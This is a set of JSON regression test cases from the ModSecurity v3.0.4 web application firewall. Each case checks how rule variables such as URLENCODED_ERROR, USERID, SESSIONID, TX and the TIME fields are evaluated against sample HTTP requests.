"User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected": { "audit_log": "", "debug_log": "Target value: \"10\" \\(Variable: REQUEST_HEADERS\\)", "error_log": "" }, "rules": [ "SecRuleEngine On", "SecRule &REQUEST_HEADERS \"@contains test \" \"id:1,t:lowercase,t:none\"" ] }, { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "Testing variable variations :: count (2/3)", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected": { "audit_log": "", "debug_log": "Target value: \"1\" \\(Variable: REQUEST_HEADERS:Accept\\)", "error_log": "" }, "rules": [ "SecRuleEngine On", "SecRule &REQUEST_HEADERS:Accept \"@contains test \" \"id:1,t:lowercase,t:none\"" ] }, { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "Testing variable variations :: count (3/3)", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected": { "audit_log": "", "debug_log": "Target value: \"0\" \\(Variable: REQUEST_HEADERS:missing\\)", "error_log": "" }, "rules": [ "SecRuleEngine On", "SecRule &REQUEST_HEADERS:missing \"@contains test \" \"id:1,t:lowercase,t:none\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-WEBSERVER_ERROR_LOG.json0000644000175000017500000000065713607066010027422 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "version_max":0, "title":"Testing Variables :: WEBSERVER_ERROR_LOG (1/1)", "expected":{ "parser_error":"Line: 1. Column: 27. Variable VARIABLE_WEBSERVER_ERROR_LOG is not supported by libModSecurity" }, "rules":[ "secrule WEBSERVER_ERROR_LOG \"@contains test\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-WEBAPPID.json0000644000175000017500000000411413607066010025567 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: WEBAPPID (1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"t:trim: \"\"" }, "rules":[ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: WEBAPPID (2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"bisteka\"" }, "rules":[ "SecRuleEngine On", "SecWebAppId bisteka", "SecRule WEBAPPID \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-USERID.json0000644000175000017500000000343613607066010025375 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing USERID variable (1/2)", "expected":{ "debug_log": "Target value: \"zimmerle2\"" }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "User-Agent":"My sweet little browser", "Cookie": "USER=zimmerle" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setuid:%{REQUEST_COOKIES:USER}%,nolog,pass\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900068',phase:1,t:none,t:sha1,t:hexEncode,setuid:%{REQUEST_COOKIES:USER}2,nolog,pass\"", "SecRule USERID \".*\" \"id:1239,phase:1,log,pass\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing USERID variable (2/2)", "expected":{ "debug_log": "Target value: \"whee\"" }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "User-Agent":"My sweet little browser", "Cookie": "USER=whee" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setuid:%{REQUEST_COOKIES:USER}%,nolog,pass\"", "SecRule USERID \".*\" \"id:1239,phase:1,log,pass\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-URLENCODED_ERROR.json0000644000175000017500000001544613607066010027003 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: URLENCODED_ERROR - GET (1/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value%2", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"1\" \\(Variable: URLENCODED_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecRule URLENCODED_ERROR \"@gt 10 \" \"id:1,pass\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: URLENCODED_ERROR - GET (2/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value&a=b%2a", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\" \\(Variable: URLENCODED_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecRule URLENCODED_ERROR \"@gt 10 \" \"id:1,pass\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: URLENCODED_ERROR - POST (3/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value12%¶m2=value2%2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"1\" \\(Variable: URLENCODED_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecRule URLENCODED_ERROR \"@gt 10 \" \"id:1,phase:3,pass\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: URLENCODED_ERROR - POST (4/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "28", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2&a=b5%2a\n" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\" \\(Variable: URLENCODED_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecRule URLENCODED_ERROR \"@gt 10 \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: URLENCODED_ERROR - POST (5/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "a=%EC%A7%84%20%EB%A7%88%EC%9D%BC%20%EB%A6%AC" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\" \\(Variable: URLENCODED_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecRule URLENCODED_ERROR \"@gt 10 \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: URLENCODED_ERROR - GET (6/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/?z=%EC%A7%84%20%EB%A7%88%EC%9D%BC%20%EB%A6%A%AC", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"1\" \\(Variable: URLENCODED_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecRule URLENCODED_ERROR \"@gt 10 \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: URLENCODED_ERROR - GET (7/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/?z=진 마일 리", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\" \\(Variable: URLENCODED_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecRule URLENCODED_ERROR \"@gt 10 \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-UNIQUE_ID.json0000644000175000017500000000175413607066010025765 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: UNIQUE_ID", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"([0-9.]+)\" \\(Variable: UNIQUE_ID\\)" }, "rules":[ "SecRuleEngine On", "SecRule UNIQUE_ID \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-TX.json0000644000175000017500000000375613607066010024742 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: TX:0 (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "whee test 123" ] }, "expected":{ "debug_log":"(.*) Target value: \"123\" \\(Variable\\: TX\\:0(.*)" }, "rules":[ "SecRuleEngine On", "SecResponseBodyAccess On", "SecRequestBodyAccess On", "SecRule RESPONSE_BODY \"@rx ([0-9]+)\" \"id:1,phase:4,capture,id:105\"", "SecRule TX \"@rx ([A-z]+)\" \"phase:4,id:106\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: TX:0 (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Cookie":"USER_TOKEN=Yes; a=z; t=b" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"USER_TOKEN\" \\(Variable: TX:0(.*)" }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@rx ([A-z]+)\" \"id:1,log,pass,capture,id:14\"", "SecRule TX:0 \"@rx ([A-z]+)\" \"id:15\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-TIME_YEAR.json0000644000175000017500000000175313607066010025760 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: TIME_YEAR", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"([0-9]+)\" \\(Variable: TIME_YEAR\\)" }, "rules":[ "SecRuleEngine On", "SecRule TIME_YEAR \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-TIME_WDAY.json0000644000175000017500000000175313607066010025764 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: TIME_WDAY", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"([0-9]+)\" \\(Variable: TIME_WDAY\\)" }, "rules":[ "SecRuleEngine On", "SecRule TIME_WDAY \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-TIME_SEC.json0000644000175000017500000000175013607066010025627 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: TIME_SEC", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"([0-9]+)\" \\(Variable: TIME_SEC\\)" }, "rules":[ "SecRuleEngine On", "SecRule TIME_SEC \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-TIME_MON.json0000644000175000017500000000175013607066010025646 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: TIME_MON", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"([0-9]+)\" \\(Variable: TIME_MON\\)" }, "rules":[ "SecRuleEngine On", "SecRule TIME_MON \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-TIME_MIN.json0000644000175000017500000000175013607066010025640 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: TIME_MIN", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"([0-9]+)\" \\(Variable: TIME_MIN\\)" }, "rules":[ "SecRuleEngine On", "SecRule TIME_MIN \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-TIME_HOUR.json0000644000175000017500000000175313607066010025775 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: TIME_HOUR", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"([0-9]+)\" \\(Variable: TIME_HOUR\\)" }, "rules":[ "SecRuleEngine On", "SecRule TIME_HOUR \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-TIME_EPOCH.json0000644000175000017500000000175613607066010026061 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: TIME_EPOCH", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"([0-9]+)\" \\(Variable: TIME_EPOCH\\)" }, "rules":[ "SecRuleEngine On", "SecRule TIME_EPOCH \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-TIME_DAY.json0000644000175000017500000000175013607066010025632 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: TIME_DAY", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"([0-9]+)\" \\(Variable: TIME_DAY\\)" }, "rules":[ "SecRuleEngine On", "SecRule TIME_DAY \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-TIME.json0000644000175000017500000000175613607066010025143 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: TIME", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"([0-9]+):([0-9]+):([0-9]+)\" \\(Variable: TIME\\)" }, "rules":[ "SecRuleEngine On", "SecRule TIME \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-STATUS.json0000644000175000017500000000416413607066010025424 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: STATUS (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"GET", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"200\" \\(Variable: RESPONSE_STATUS\\)" }, "rules":[ "SecRuleEngine On", "SecRule RESPONSE_STATUS \"@contains test\" \"id:1,phase:5,rev:1.3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: STATUS (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"GET", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"500\" \\(Variable: RESPONSE_STATUS\\)", "http_code": 500 }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@pm value\" \"id:1,phase:2,t:trim,status:500,deny\"", "SecRule RESPONSE_STATUS \"@contains test\" \"id:2,phase:5,rev:1.3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-SESSIONID.json0000644000175000017500000000417713607066010025745 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing SESSIONID variable (1/2)", "expected":{ "debug_log": "Target value: \"rAAAAAAA2t5uvjq435r4q7ib3vtdjq1202\"" }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "User-Agent":"My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setsid:%{REQUEST_COOKIES:PHPSESSID}%,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:SESSION.score=+10\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900068',phase:1,t:none,t:sha1,t:hexEncode,setsid:%{REQUEST_COOKIES:PHPSESSID}2,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900022',phase:1,setvar:SESSION.score=+5\"", "SecRule SESSIONID \".*\" \"id:1239,phase:1,log,pass\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing SESSIONID variable (2/2)", "expected":{ "debug_log": "Target value: \"whee\"" }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ 